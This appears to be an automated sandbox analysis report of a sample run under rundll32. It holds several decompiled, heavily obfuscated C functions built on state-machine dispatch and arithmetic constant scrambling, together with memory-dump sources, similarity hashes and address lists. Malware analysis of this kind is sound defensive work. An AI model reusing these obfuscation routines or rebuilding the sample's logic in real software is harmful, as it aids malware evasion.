                                                                                                                      				_v44 = _v44 ^ 0xa28277a7;
                                                                                                                      				_v44 = _v44 ^ 0xa6d14151;
                                                                                                                      				_v80 = 0xd07577;
                                                                                                                      				_v80 = _v80 | 0x5043dc19;
                                                                                                                      				_v80 = _v80 * 0x49;
                                                                                                                      				_v80 = _v80 * 0x43;
                                                                                                                      				_v80 = _v80 ^ 0x4228a280;
                                                                                                                      				while(1) {
                                                                                                                      					L1:
                                                                                                                      					_t218 = 0x35852e4;
                                                                                                                      					do {
                                                                                                                      						while(_t251 != _t218) {
                                                                                                                      							if(_t251 == 0x38ba83c) {
                                                                                                                      								_t251 = 0xe9ff08f;
                                                                                                                      								continue;
                                                                                                                      							} else {
                                                                                                                      								if(_t251 == 0x83f204b) {
                                                                                                                      									E002B7AF8(_v76, _v12, _v8, _v44, _v80);
                                                                                                                      								} else {
                                                                                                                      									if(_t251 == 0xe0715ba) {
                                                                                                                      										_push(_v100);
                                                                                                                      										_push(_v96);
                                                                                                                      										_t238 = _v72;
                                                                                                                      										_push(0x2b118c);
                                                                                                                      										__eflags = E002B8786(_v84, _v40, _v72,  &_v8, _v88, E002BAB66(_v72, _v40, __eflags), _v24, _v92, _v72, _t238, _v28, _v32, _v68, _t238, _v36);
                                                                                                                      										_t251 =  ==  ? 0x35852e4 : 0xdf478d7;
                                                                                                                      										E002BAE03(_v20, _v60, _v64, _t222);
                                                                                                                      										_t255 =  &(_t255[0x12]);
                                                                                                                      										L14:
                                                                                                                      										_t218 = 0x35852e4;
                                                                                                                      										_t233 = 0x5c;
                                                                                                                      										goto L15;
                                                                                                                      									} else {
                                                                                                                      										if(_t251 != 0xe9ff08f) {
                                                                                                                      											goto L15;
                                                                                                                      										} else {
                                                                                                                      											_t228 =  *0x2d520c; // 0x0
                                                                                                                      											_t229 = _t228 + 0x220;
                                                                                                                      											while( *_t229 != _t233) {
                                                                                                                      												_t229 = _t229 + 2;
                                                                                                                      												__eflags = _t229;
                                                                                                                      											}
                                                                                                                      											_t227 = _t229 + 2;
                                                                                                                      											_t251 = 0xe0715ba;
                                                                                                                      											goto L1;
                                                                                                                      										}
                                                                                                                      									}
                                                                                                                      								}
                                                                                                                      							}
                                                                                                                      							L18:
                                                                                                                      							return _v4;
                                                                                                                      						}
                                                                                                                      						_t219 = E002BEFA6(_v48, _v16, _t227, _v52, _v8, _v56);
                                                                                                                      						_t255 =  &(_t255[4]);
                                                                                                                      						__eflags = _t219;
                                                                                                                      						_t251 = 0x83f204b;
                                                                                                                      						_t196 = _t219 == 0;
                                                                                                                      						__eflags = _t196;
                                                                                                                      						_v4 = 0 | _t196;
                                                                                                                      						goto L14;
                                                                                                                      						L15:
                                                                                                                      						__eflags = _t251 - 0xdf478d7;
                                                                                                                      					} while (__eflags != 0);
                                                                                                                      					goto L18;
                                                                                                                      				}
                                                                                                                      			}








































                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000B.00000002.443285949.00000000002B1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                      • Associated: 0000000B.00000002.443281134.00000000002B0000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      • Associated: 0000000B.00000002.443300447.00000000002D5000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_11_2_2b0000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: m3$mZ;
                                                                                                                      • API String ID: 0-2099856273
                                                                                                                      • Opcode ID: 99b550a256a5b65e6c9fb908ec07323d3f2f98f22e4f6a124c5eeba4f461e6c2
                                                                                                                      • Instruction ID: 1c8a7ea7a55674623a0262d305236250653e5aa47d89793e0accefef4e1042ce
                                                                                                                      • Opcode Fuzzy Hash: 99b550a256a5b65e6c9fb908ec07323d3f2f98f22e4f6a124c5eeba4f461e6c2
                                                                                                                      • Instruction Fuzzy Hash: 59A111B25093409BC368CF25D98A91BFBF1BBD8798F104A1DF29596260D3B1CA19CF47
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      C-Code - Quality: 92%
                                                                                                                      			E002CFF31(intOrPtr* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                                                                      				char _v48;
                                                                                                                      				intOrPtr _v52;
                                                                                                                      				intOrPtr _v56;
                                                                                                                      				intOrPtr _v60;
                                                                                                                      				signed int _v64;
                                                                                                                      				signed int _v68;
                                                                                                                      				signed int _v72;
                                                                                                                      				signed int _v76;
                                                                                                                      				signed int _v80;
                                                                                                                      				signed int _v84;
                                                                                                                      				signed int _v88;
                                                                                                                      				signed int _v92;
                                                                                                                      				signed int _v96;
                                                                                                                      				unsigned int _v100;
                                                                                                                      				signed int _v104;
                                                                                                                      				signed int _v108;
                                                                                                                      				unsigned int _v112;
                                                                                                                      				unsigned int _v116;
                                                                                                                      				signed int _v120;
                                                                                                                      				signed int _v124;
                                                                                                                      				void* _t147;
                                                                                                                      				intOrPtr _t161;
                                                                                                                      				signed int _t169;
                                                                                                                      				void* _t172;
                                                                                                                      				void* _t188;
                                                                                                                      				intOrPtr* _t189;
                                                                                                                      				void* _t191;
                                                                                                                      				void* _t192;
                                                                                                                      
                                                                                                                      				_push(_a12);
                                                                                                                      				_t188 = __edx;
                                                                                                                      				_t189 = __ecx;
                                                                                                                      				_push(_a8);
                                                                                                                      				_push(_a4);
                                                                                                                      				_push(__edx);
                                                                                                                      				_push(__ecx);
                                                                                                                      				E002BCF25(_t147);
                                                                                                                      				_v60 = 0xe50c8f;
                                                                                                                      				_v56 = 0;
                                                                                                                      				_t192 = _t191 + 0x14;
                                                                                                                      				_v52 = 0;
                                                                                                                      				_v76 = 0x2f3c66;
                                                                                                                      				_t172 = 0x80c5f05;
                                                                                                                      				_v76 = _v76 >> 1;
                                                                                                                      				_v76 = _v76 ^ 0x00179e33;
                                                                                                                      				_v100 = 0xdfcc0f;
                                                                                                                      				_v100 = _v100 + 0x5dbe;
                                                                                                                      				_v100 = _v100 >> 0xc;
                                                                                                                      				_v100 = _v100 ^ 0x00087c2f;
                                                                                                                      				_v112 = 0xadc62;
                                                                                                                      				_v112 = _v112 | 0x1372df76;
                                                                                                                      				_v112 = _v112 >> 7;
                                                                                                                      				_v112 = _v112 ^ 0x002d2981;
                                                                                                                      				_v116 = 0xfe909d;
                                                                                                                      				_v116 = _v116 << 7;
                                                                                                                      				_t169 = 0x44;
                                                                                                                      				_v116 = _v116 / _t169;
                                                                                                                      				_v116 = _v116 >> 0xc;
                                                                                                                      				_v116 = _v116 ^ 0x0009e39a;
                                                                                                                      				_v120 = 0xded18e;
                                                                                                                      				_v120 = _v120 + 0xffff5063;
                                                                                                                      				_v120 = _v120 ^ 0xd3175283;
                                                                                                                      				_v120 = _v120 * 0x6d;
                                                                                                                      				_v120 = _v120 ^ 0x2cc94156;
                                                                                                                      				_v124 = 0xc7fb01;
                                                                                                                      				_v124 = _v124 + 0xffff9b92;
                                                                                                                      				_v124 = _v124 | 0x8f919799;
                                                                                                                      				_v124 = _v124 + 0xaff8;
                                                                                                                      				_v124 = _v124 ^ 0x8fd45f25;
                                                                                                                      				_v68 = 0xadf2f0;
                                                                                                                      				_v68 = _v68 << 3;
                                                                                                                      				_v68 = _v68 ^ 0x056cc5e6;
                                                                                                                      				_v72 = 0x9db552;
                                                                                                                      				_v72 = _v72 << 6;
                                                                                                                      				_v72 = _v72 ^ 0x276b9b1e;
                                                                                                                      				_v64 = 0x9edb03;
                                                                                                                      				_v64 = _v64 ^ 0x7ad40136;
                                                                                                                      				_v64 = _v64 ^ 0x7a416b45;
                                                                                                                      				_v96 = 0x899086;
                                                                                                                      				_v96 = _v96 + 0x3abe;
                                                                                                                      				_v96 = _v96 + 0xffff9b83;
                                                                                                                      				_v96 = _v96 ^ 0x008dc818;
                                                                                                                      				_v80 = 0x1613a8;
                                                                                                                      				_v80 = _v80 >> 8;
                                                                                                                      				_v80 = _v80 ^ 0x000fe8a1;
                                                                                                                      				_v84 = 0xc2e1e1;
                                                                                                                      				_v84 = _v84 << 4;
                                                                                                                      				_v84 = _v84 ^ 0x0c264902;
                                                                                                                      				_v104 = 0x78369d;
                                                                                                                      				_v104 = _v104 ^ 0x8f03ebf2;
                                                                                                                      				_v104 = _v104 * 0x5b;
                                                                                                                      				_v104 = _v104 ^ 0x010dd9c3;
                                                                                                                      				_v88 = 0x6e061c;
                                                                                                                      				_v88 = _v88 * 0x7f;
                                                                                                                      				_v88 = _v88 >> 6;
                                                                                                                      				_v88 = _v88 ^ 0x00d4f969;
                                                                                                                      				_v92 = 0x56c027;
                                                                                                                      				_v92 = _v92 ^ 0x48eed99d;
                                                                                                                      				_v92 = _v92 + 0xffff6999;
                                                                                                                      				_v92 = _v92 ^ 0x48bab2c5;
                                                                                                                      				_v108 = 0xffa91b;
                                                                                                                      				_v108 = _v108 * 0x23;
                                                                                                                      				_v108 = _v108 | 0x4c85b786;
                                                                                                                      				_v108 = _v108 * 0x3a;
                                                                                                                      				_v108 = _v108 ^ 0x23a92266;
                                                                                                                      				do {
                                                                                                                      					while(_t172 != 0xd9dda6) {
                                                                                                                      						if(_t172 == 0x1ff9304) {
                                                                                                                      							E002C4D91( *((intOrPtr*)(_t188 + 0x14)),  &_v48, _v64, _v96);
                                                                                                                      							_t192 = _t192 + 8;
                                                                                                                      							_t172 = 0xcf0dfe0;
                                                                                                                      							continue;
                                                                                                                      						} else {
                                                                                                                      							if(_t172 == 0x2f8759c) {
                                                                                                                      								_push(_t172);
                                                                                                                      								_push(_t172);
                                                                                                                      								_t161 = E002C3512( *(_t189 + 4));
                                                                                                                      								 *_t189 = _t161;
                                                                                                                      								__eflags = _t161;
                                                                                                                      								if(__eflags != 0) {
                                                                                                                      									_t172 = 0x3d5ab39;
                                                                                                                      									continue;
                                                                                                                      								}
                                                                                                                      							} else {
                                                                                                                      								if(_t172 == 0x3d5ab39) {
                                                                                                                      									E002C64C5(_v120, _v124, _v68, _v72, _t189,  &_v48);
                                                                                                                      									_t192 = _t192 + 0x10;
                                                                                                                      									_t172 = 0x1ff9304;
                                                                                                                      									continue;
                                                                                                                      								} else {
                                                                                                                      									if(_t172 == 0x80c5f05) {
                                                                                                                      										_t172 = 0xd9dda6;
                                                                                                                      										 *_t189 = 0;
                                                                                                                      										 *(_t189 + 4) = _v76;
                                                                                                                      										continue;
                                                                                                                      									} else {
                                                                                                                      										if(_t172 == 0xcf0dfe0) {
                                                                                                                      											E002CF88F(_t188 + 0xc,  &_v48, __eflags, _v80, _v84, _v104);
                                                                                                                      											_t192 = _t192 + 0xc;
                                                                                                                      											_t172 = 0xfec6e86;
                                                                                                                      											continue;
                                                                                                                      										} else {
                                                                                                                      											_t201 = _t172 - 0xfec6e86;
                                                                                                                      											if(_t172 != 0xfec6e86) {
                                                                                                                      												goto L17;
                                                                                                                      											} else {
                                                                                                                      												E002CF88F(_t188 + 4,  &_v48, _t201, _v88, _v92, _v108);
                                                                                                                      											}
                                                                                                                      										}
                                                                                                                      									}
                                                                                                                      								}
                                                                                                                      							}
                                                                                                                      						}
                                                                                                                      						L9:
                                                                                                                      						return 0 |  *_t189 != 0x00000000;
                                                                                                                      					}
                                                                                                                      					 *(_t189 + 4) = E002C542E(_t188);
                                                                                                                      					_t172 = 0x2f8759c;
                                                                                                                      					L17:
                                                                                                                      					__eflags = _t172 - 0x1551776;
                                                                                                                      				} while (__eflags != 0);
                                                                                                                      				goto L9;
                                                                                                                      			}
































                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000B.00000002.443285949.00000000002B1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                      • Associated: 0000000B.00000002.443281134.00000000002B0000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      • Associated: 0000000B.00000002.443300447.00000000002D5000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_11_2_2b0000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: EkAz$f</
                                                                                                                      • API String ID: 0-1101062405
                                                                                                                      • Opcode ID: 176f34a4d972b3be30e831d244042a966be3787b960c3fd105b0c124aa8a18ff
                                                                                                                      • Instruction ID: 913432869c9d6da5ac872e1800d8334707c02ec0e1a5de820b3e32110549e6f3
                                                                                                                      • Opcode Fuzzy Hash: 176f34a4d972b3be30e831d244042a966be3787b960c3fd105b0c124aa8a18ff
                                                                                                                      • Instruction Fuzzy Hash: 3A8111710183419FC368CF25C98A92BFBF1FBC4748F504A1EF69A46260D7B19A59CF82
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      C-Code - Quality: 91%
                                                                                                                      			E002CC9A9(void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
                                                                                                                      				char _v4;
                                                                                                                      				signed int _v8;
                                                                                                                      				signed int _v12;
                                                                                                                      				signed int _v16;
                                                                                                                      				signed int _v20;
                                                                                                                      				signed int _v24;
                                                                                                                      				signed int _v28;
                                                                                                                      				signed int _v32;
                                                                                                                      				signed int _v36;
                                                                                                                      				signed int _v40;
                                                                                                                      				signed int _v44;
                                                                                                                      				signed int _v48;
                                                                                                                      				signed int _v52;
                                                                                                                      				signed int _v56;
                                                                                                                      				signed int _v60;
                                                                                                                      				signed int _v64;
                                                                                                                      				void* __ecx;
                                                                                                                      				void* _t147;
                                                                                                                      				void* _t168;
                                                                                                                      				void* _t171;
                                                                                                                      				signed int _t188;
                                                                                                                      				signed int _t189;
                                                                                                                      				signed int _t190;
                                                                                                                      				void* _t192;
                                                                                                                      				signed int* _t195;
                                                                                                                      
                                                                                                                      				_push(_a16);
                                                                                                                      				_push(_a12);
                                                                                                                      				_push(_a8);
                                                                                                                      				_push(_a4);
                                                                                                                      				_push(__edx);
                                                                                                                      				E002BCF25(_t147);
                                                                                                                      				_v60 = 0x2183dd;
                                                                                                                      				_t195 =  &(( &_v64)[6]);
                                                                                                                      				_v60 = _v60 << 0xc;
                                                                                                                      				_v60 = _v60 << 0xf;
                                                                                                                      				_t192 = 0;
                                                                                                                      				_t171 = 0xa488efe;
                                                                                                                      				_t188 = 0x78;
                                                                                                                      				_v60 = _v60 * 0xa;
                                                                                                                      				_v60 = _v60 ^ 0x10000001;
                                                                                                                      				_v44 = 0xe22f1a;
                                                                                                                      				_v44 = _v44 + 0xffffab53;
                                                                                                                      				_v44 = _v44 / _t188;
                                                                                                                      				_v44 = _v44 >> 3;
                                                                                                                      				_v44 = _v44 ^ 0x00003c3b;
                                                                                                                      				_v36 = 0x9a4ce6;
                                                                                                                      				_v36 = _v36 + 0xffffe16e;
                                                                                                                      				_v36 = _v36 | 0x72a3b0b5;
                                                                                                                      				_v36 = _v36 ^ 0x32bbbef5;
                                                                                                                      				_v28 = 0xd892e4;
                                                                                                                      				_v28 = _v28 | 0x189bde37;
                                                                                                                      				_v28 = _v28 ^ 0x998d043c;
                                                                                                                      				_v28 = _v28 ^ 0xc156dacb;
                                                                                                                      				_v20 = 0xff0234;
                                                                                                                      				_v20 = _v20 + 0xffffad5b;
                                                                                                                      				_v20 = _v20 ^ 0x00f1fad0;
                                                                                                                      				_v40 = 0xdc05b;
                                                                                                                      				_v40 = _v40 ^ 0xb55e20f9;
                                                                                                                      				_t189 = 3;
                                                                                                                      				_v40 = _v40 / _t189;
                                                                                                                      				_v40 = _v40 ^ 0x3c7a3b1c;
                                                                                                                      				_v64 = 0x518ad0;
                                                                                                                      				_v64 = _v64 ^ 0x6bfb13ad;
                                                                                                                      				_v64 = _v64 << 2;
                                                                                                                      				_t190 = 0x6a;
                                                                                                                      				_v64 = _v64 * 7;
                                                                                                                      				_v64 = _v64 ^ 0xc6a3f60b;
                                                                                                                      				_v24 = 0x25f852;
                                                                                                                      				_v24 = _v24 + 0xffff91c6;
                                                                                                                      				_v24 = _v24 ^ 0x002d038f;
                                                                                                                      				_v32 = 0x681d6c;
                                                                                                                      				_v32 = _v32 ^ 0x9f49642f;
                                                                                                                      				_v32 = _v32 * 0x3a;
                                                                                                                      				_v32 = _v32 ^ 0x0d93f477;
                                                                                                                      				_v56 = 0xa4373;
                                                                                                                      				_v56 = _v56 >> 9;
                                                                                                                      				_v56 = _v56 << 0xb;
                                                                                                                      				_v56 = _v56 << 9;
                                                                                                                      				_v56 = _v56 ^ 0x521bad52;
                                                                                                                      				_v16 = 0x3abafe;
                                                                                                                      				_v16 = _v16 | 0x2531d7a0;
                                                                                                                      				_v16 = _v16 ^ 0x25301684;
                                                                                                                      				_v48 = 0x8b99e8;
                                                                                                                      				_v48 = _v48 ^ 0x8a9a3b2d;
                                                                                                                      				_v48 = _v48 * 0x56;
                                                                                                                      				_v48 = _v48 / _t190;
                                                                                                                      				_v48 = _v48 ^ 0x00e0af40;
                                                                                                                      				_v8 = 0xf2305e;
                                                                                                                      				_v8 = _v8 | 0x3a3bb36f;
                                                                                                                      				_v8 = _v8 ^ 0x3af325a3;
                                                                                                                      				_v52 = 0xa4558c;
                                                                                                                      				_v52 = _v52 >> 0xe;
                                                                                                                      				_v52 = _v52 << 0xd;
                                                                                                                      				_v52 = _v52 + 0xad08;
                                                                                                                      				_v52 = _v52 ^ 0x0057bd84;
                                                                                                                      				_v12 = 0xb8a572;
                                                                                                                      				_v12 = _v12 | 0x00b7603c;
                                                                                                                      				_v12 = _v12 ^ 0x00ba29b3;
                                                                                                                      				while(_t171 != 0x263a30c) {
                                                                                                                      					if(_t171 == 0x50e379a) {
                                                                                                                      						_push(_t171);
                                                                                                                      						_push(_t171);
                                                                                                                      						_t192 = E002C3512(_v4 + _v4);
                                                                                                                      						if(_t192 != 0) {
                                                                                                                      							_t171 = 0x263a30c;
                                                                                                                      							continue;
                                                                                                                      						}
                                                                                                                      					} else {
                                                                                                                      						if(_t171 == 0xa488efe) {
                                                                                                                      							_t171 = 0xdc1694f;
                                                                                                                      							continue;
                                                                                                                      						} else {
                                                                                                                      							if(_t171 != 0xdc1694f) {
                                                                                                                      								L11:
                                                                                                                      								if(_t171 != 0xa17b831) {
                                                                                                                      									continue;
                                                                                                                      								}
                                                                                                                      							} else {
                                                                                                                      								_t168 = E002CD2A8(0, _v36 | _v60, _v20, _a16, _v40, _v64, _a8, _v24,  &_v4);
                                                                                                                      								_t195 =  &(_t195[7]);
                                                                                                                      								if(_t168 != 0) {
                                                                                                                      									_t171 = 0x50e379a;
                                                                                                                      									continue;
                                                                                                                      								}
                                                                                                                      							}
                                                                                                                      						}
                                                                                                                      					}
                                                                                                                      					return _t192;
                                                                                                                      				}
                                                                                                                      				E002CD2A8(_t192, _v28 | _v44, _v48, _a16, _v8, _v52, _a8, _v12,  &_v4);
                                                                                                                      				_t195 =  &(_t195[7]);
                                                                                                                      				_t171 = 0xa17b831;
                                                                                                                      				goto L11;
                                                                                                                      			}




























                                                                                                                      0x002ccc33
                                                                                                                      0x002ccc39
                                                                                                                      0x002ccc3b
                                                                                                                      0x00000000
                                                                                                                      0x002ccc3b
                                                                                                                      0x002ccbce
                                                                                                                      0x002ccbd4
                                                                                                                      0x002ccc15
                                                                                                                      0x00000000
                                                                                                                      0x002ccbd6
                                                                                                                      0x002ccbd8
                                                                                                                      0x002ccc73
                                                                                                                      0x002ccc79
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x002ccbde
                                                                                                                      0x002ccc05
                                                                                                                      0x002ccc0a
                                                                                                                      0x002ccc0f
                                                                                                                      0x002ccc11
                                                                                                                      0x00000000
                                                                                                                      0x002ccc11
                                                                                                                      0x002ccc0f
                                                                                                                      0x002ccbd8
                                                                                                                      0x002ccbd4
                                                                                                                      0x002ccc88
                                                                                                                      0x002ccc88
                                                                                                                      0x002ccc66
                                                                                                                      0x002ccc6b
                                                                                                                      0x002ccc6e
                                                                                                                      0x00000000

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000B.00000002.443285949.00000000002B1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                      • Associated: 0000000B.00000002.443281134.00000000002B0000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      • Associated: 0000000B.00000002.443300447.00000000002D5000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_11_2_2b0000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: ;<$sC
                                                                                                                      • API String ID: 0-4190640370
                                                                                                                      • Opcode ID: afae9e4ec36a9a9b8992dcbfdbb27de80e6d34688f14d12214c490c57e1a3fcd
                                                                                                                      • Instruction ID: 856cde13cbcede3a75235c4a9b21b9bcaca2855a292c4752f8b719073b023442
                                                                                                                      • Opcode Fuzzy Hash: afae9e4ec36a9a9b8992dcbfdbb27de80e6d34688f14d12214c490c57e1a3fcd
                                                                                                                      • Instruction Fuzzy Hash: F87122721183819FC354CF25C88A91FBBF2FBD4798F544A1DF59A86220C372DA59CB86
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      C-Code - Quality: 90%
                                                                                                                      			E002B777B(void* __ecx, signed int* __edx, intOrPtr* _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
                                                                                                                      				char _v52;
                                                                                                                      				signed int _v56;
                                                                                                                      				signed int _v60;
                                                                                                                      				signed int _v64;
                                                                                                                      				signed int _v68;
                                                                                                                      				unsigned int _v72;
                                                                                                                      				signed int _v76;
                                                                                                                      				signed int _v80;
                                                                                                                      				signed int _v84;
                                                                                                                      				signed int _v88;
                                                                                                                      				signed int _v92;
                                                                                                                      				signed int _v96;
                                                                                                                      				signed int _v100;
                                                                                                                      				signed int _v104;
                                                                                                                      				void* _t128;
                                                                                                                      				signed int _t149;
                                                                                                                      				signed int _t152;
                                                                                                                      				signed int _t153;
                                                                                                                      				signed int _t154;
                                                                                                                      				signed int _t155;
                                                                                                                      				void* _t158;
                                                                                                                      				signed int* _t179;
                                                                                                                      				void* _t181;
                                                                                                                      				void* _t182;
                                                                                                                      
                                                                                                                      				_push(_a16);
                                                                                                                      				_t178 = _a4;
                                                                                                                      				_t179 = __edx;
                                                                                                                      				_push(_a12);
                                                                                                                      				_push(_a8);
                                                                                                                      				_push(_a4);
                                                                                                                      				_push(__edx);
                                                                                                                      				_push(__ecx);
                                                                                                                      				E002BCF25(_t128);
                                                                                                                      				_v104 = 0x8623b;
                                                                                                                      				_t182 = _t181 + 0x18;
                                                                                                                      				_v104 = _v104 + 0xffff31eb;
                                                                                                                      				_v104 = _v104 | 0x66daf122;
                                                                                                                      				_t158 = 0xd040992;
                                                                                                                      				_t152 = 0x22;
                                                                                                                      				_v104 = _v104 / _t152;
                                                                                                                      				_v104 = _v104 ^ 0x03069644;
                                                                                                                      				_v100 = 0x2bbbe;
                                                                                                                      				_t153 = 0x14;
                                                                                                                      				_v100 = _v100 * 0xf;
                                                                                                                      				_v100 = _v100 / _t153;
                                                                                                                      				_v100 = _v100 | 0x351d3417;
                                                                                                                      				_v100 = _v100 ^ 0x351dc123;
                                                                                                                      				_v72 = 0xab81ef;
                                                                                                                      				_v72 = _v72 >> 0xd;
                                                                                                                      				_v72 = _v72 ^ 0x000a49b6;
                                                                                                                      				_v76 = 0x16a933;
                                                                                                                      				_v76 = _v76 ^ 0xe7c1b086;
                                                                                                                      				_v76 = _v76 ^ 0xe7d23b20;
                                                                                                                      				_v60 = 0x52cbe;
                                                                                                                      				_t154 = 0x2d;
                                                                                                                      				_v60 = _v60 * 0x6f;
                                                                                                                      				_v60 = _v60 ^ 0x023eaa51;
                                                                                                                      				_v84 = 0x759948;
                                                                                                                      				_v84 = _v84 + 0x9b78;
                                                                                                                      				_v84 = _v84 ^ 0xc5583688;
                                                                                                                      				_v84 = _v84 ^ 0xc523a4cd;
                                                                                                                      				_v88 = 0xf8b174;
                                                                                                                      				_v88 = _v88 << 0xa;
                                                                                                                      				_v88 = _v88 | 0xb04365c9;
                                                                                                                      				_v88 = _v88 ^ 0xf2c73fc1;
                                                                                                                      				_v64 = 0x1cff55;
                                                                                                                      				_v64 = _v64 / _t154;
                                                                                                                      				_v64 = _v64 ^ 0x000b3edd;
                                                                                                                      				_v68 = 0x9a9e72;
                                                                                                                      				_v68 = _v68 + 0xffffcb3f;
                                                                                                                      				_v68 = _v68 ^ 0x009b4266;
                                                                                                                      				_v92 = 0x7b2ebb;
                                                                                                                      				_v92 = _v92 << 0xb;
                                                                                                                      				_v92 = _v92 ^ 0xf233ff82;
                                                                                                                      				_v92 = _v92 ^ 0x2b4dc82a;
                                                                                                                      				_v96 = 0x6d21c4;
                                                                                                                      				_v96 = _v96 ^ 0x8acf53c4;
                                                                                                                      				_v96 = _v96 + 0xffff3a52;
                                                                                                                      				_v96 = _v96 | 0xe5741bb4;
                                                                                                                      				_v96 = _v96 ^ 0xeff12f72;
                                                                                                                      				_v56 = 0x5c5116;
                                                                                                                      				_v56 = _v56 + 0xffff598a;
                                                                                                                      				_v56 = _v56 ^ 0x00573a27;
                                                                                                                      				_v80 = 0xae67f2;
                                                                                                                      				_v80 = _v80 + 0x56e4;
                                                                                                                      				_t155 = 0x50;
                                                                                                                      				_v80 = _v80 / _t155;
                                                                                                                      				_v80 = _v80 ^ 0x0002e359;
                                                                                                                      				do {
                                                                                                                      					while(_t158 != 0x253e674) {
                                                                                                                      						if(_t158 == 0x4f8855c) {
                                                                                                                      							E002CF88F(_t178 + 4,  &_v52, __eflags, _v96, _v56, _v80);
                                                                                                                      						} else {
                                                                                                                      							if(_t158 == 0x5caea7a) {
                                                                                                                      								E002C4D91( *_t178,  &_v52, _v68, _v92);
                                                                                                                      								_t182 = _t182 + 8;
                                                                                                                      								_t158 = 0x4f8855c;
                                                                                                                      								continue;
                                                                                                                      							} else {
                                                                                                                      								if(_t158 == 0x9ad54af) {
                                                                                                                      									_push(_t158);
                                                                                                                      									_push(_t158);
                                                                                                                      									_t149 = E002C3512(_t179[1]);
                                                                                                                      									 *_t179 = _t149;
                                                                                                                      									__eflags = _t149;
                                                                                                                      									if(__eflags != 0) {
                                                                                                                      										_t158 = 0x253e674;
                                                                                                                      										continue;
                                                                                                                      									}
                                                                                                                      								} else {
                                                                                                                      									if(_t158 == 0xa436207) {
                                                                                                                      										_t179[1] = E002C109E(_t178);
                                                                                                                      										_t158 = 0x9ad54af;
                                                                                                                      										continue;
                                                                                                                      									} else {
                                                                                                                      										if(_t158 != 0xd040992) {
                                                                                                                      											goto L13;
                                                                                                                      										} else {
                                                                                                                      											_t158 = 0xa436207;
                                                                                                                      											 *_t179 =  *_t179 & 0x00000000;
                                                                                                                      											_t179[1] = _v104;
                                                                                                                      											continue;
                                                                                                                      										}
                                                                                                                      									}
                                                                                                                      								}
                                                                                                                      							}
                                                                                                                      						}
                                                                                                                      						L16:
                                                                                                                      						__eflags =  *_t179;
                                                                                                                      						_t127 =  *_t179 != 0;
                                                                                                                      						__eflags = _t127;
                                                                                                                      						return 0 | _t127;
                                                                                                                      					}
                                                                                                                      					E002C64C5(_v60, _v84, _v88, _v64, _t179,  &_v52);
                                                                                                                      					_t182 = _t182 + 0x10;
                                                                                                                      					_t158 = 0x5caea7a;
                                                                                                                      					L13:
                                                                                                                      					__eflags = _t158 - 0x12a0183;
                                                                                                                      				} while (__eflags != 0);
                                                                                                                      				goto L16;
                                                                                                                      			}
                                                                                                                      0x002b786a
                                                                                                                      0x002b7872
                                                                                                                      0x002b787a
                                                                                                                      0x002b7882
                                                                                                                      0x002b7887
                                                                                                                      0x002b788f
                                                                                                                      0x002b7897
                                                                                                                      0x002b78a5
                                                                                                                      0x002b78a9
                                                                                                                      0x002b78b1
                                                                                                                      0x002b78b9
                                                                                                                      0x002b78c1
                                                                                                                      0x002b78c9
                                                                                                                      0x002b78d1
                                                                                                                      0x002b78d6
                                                                                                                      0x002b78de
                                                                                                                      0x002b78e6
                                                                                                                      0x002b78ee
                                                                                                                      0x002b78f6
                                                                                                                      0x002b78fe
                                                                                                                      0x002b7906
                                                                                                                      0x002b790e
                                                                                                                      0x002b7916
                                                                                                                      0x002b791e
                                                                                                                      0x002b7926
                                                                                                                      0x002b792e
                                                                                                                      0x002b793e
                                                                                                                      0x002b794b
                                                                                                                      0x002b794f
                                                                                                                      0x002b7957
                                                                                                                      0x002b7957
                                                                                                                      0x002b7965
                                                                                                                      0x002b7a30
                                                                                                                      0x002b796b
                                                                                                                      0x002b7971
                                                                                                                      0x002b79da
                                                                                                                      0x002b79df
                                                                                                                      0x002b79e2
                                                                                                                      0x00000000
                                                                                                                      0x002b7973
                                                                                                                      0x002b7979
                                                                                                                      0x002b79b6
                                                                                                                      0x002b79b7
                                                                                                                      0x002b79bb
                                                                                                                      0x002b79c0
                                                                                                                      0x002b79c4
                                                                                                                      0x002b79c6
                                                                                                                      0x002b79c8
                                                                                                                      0x00000000
                                                                                                                      0x002b79c8
                                                                                                                      0x002b797b
                                                                                                                      0x002b797d
                                                                                                                      0x002b79a0
                                                                                                                      0x002b79a3
                                                                                                                      0x00000000
                                                                                                                      0x002b797f
                                                                                                                      0x002b7985
                                                                                                                      0x00000000
                                                                                                                      0x002b798b
                                                                                                                      0x002b798f
                                                                                                                      0x002b7991
                                                                                                                      0x002b7994
                                                                                                                      0x00000000
                                                                                                                      0x002b7994
                                                                                                                      0x002b7985
                                                                                                                      0x002b797d
